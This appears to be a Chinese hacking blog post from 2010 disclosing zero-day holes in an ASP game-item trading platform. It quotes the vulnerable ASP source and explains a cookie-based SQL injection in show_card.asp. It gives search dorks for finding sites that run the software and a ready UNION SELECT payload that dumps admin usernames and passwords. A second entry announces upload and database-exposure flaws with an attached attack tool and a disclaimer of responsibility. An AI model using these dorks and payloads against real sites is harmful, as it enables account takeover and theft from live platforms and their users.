浏览模式: 标准 | 列表Tag:华速

下载:http://down.admin5.com/asp/46191.html

关键字:inurl:show_card.asp?id=

漏洞文件:show_card.asp及其他多个文件

FROM:http://www.st999.cn/blog

<%id=trim(request("id"))
if id ="" then
response.Redirect("default.asp")
response.End()
end if
set rs=conn.execute("select * from card where id ="&id)
if rs.eof then
response.Write "该卡不存在"
response.End()
end if
user_name=rs("add_user")
set c1=conn.execute("select * from card_class where id="&rs("class_1"))
      if not c1.eof then
  c1_name=c1("name")
  card_img=c1("card_img")
  card_url=c1("card_url")
  end if
%>

这里的id直接代入查询,而程序也只防了get和post两种注入,那么我们就可以采用cookie注入获得管理员用户名和密码

大小: 60.39 K
尺寸: 500 x 399
浏览: 79 次
点击打开新窗口浏览全图

exp:

and 1=2 union select 1,2,3,admin,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin_user

 

Tags: 华速

华速网游交易平台oday

Submitted by admin
2010, July 23, 9:36 AM

FROM http://www.st999.cn/blog

程序:华速网游交易平台

漏洞:上传,暴库

关键字 inurl:list_buy.asp?class_1

声明一下,这个程序是网游在线交易平台,若有人利用此漏洞进行破坏,本人概不负责,我只是安全爱好者而已!

效果见图:

大小: 46.76 K
尺寸: 500 x 156
浏览: 163 次
点击打开新窗口浏览全图

工具在附件里

 

 

附件: 华速网游交易平台 oday.html (1.77 K, 下载次数:397)

Tags: 华速